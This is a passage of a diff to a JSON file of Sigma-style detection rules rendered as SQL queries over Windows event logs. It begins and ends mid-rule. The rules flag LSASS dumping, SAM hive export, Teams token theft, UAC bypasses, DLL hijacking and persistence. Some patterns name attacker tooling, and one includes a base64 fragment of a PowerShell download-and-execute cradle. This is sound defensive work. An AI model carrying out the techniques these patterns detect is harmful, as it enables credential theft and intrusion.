'\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "cve.2021.44077" ], "falsepositives": [ - "Programs that connect locally to the RDP port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" + ], + "filename": "file_event_win_susp_system_interactive_powershell.yml" + }, + { + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "status": "experimental", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", "attack.persistence", - "attack.t1546.003" + "attack.execution", + "attack.t1053" ], "falsepositives": [ - "SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "status": "test", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "status": "experimental", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "status": "experimental", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Unknown" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start 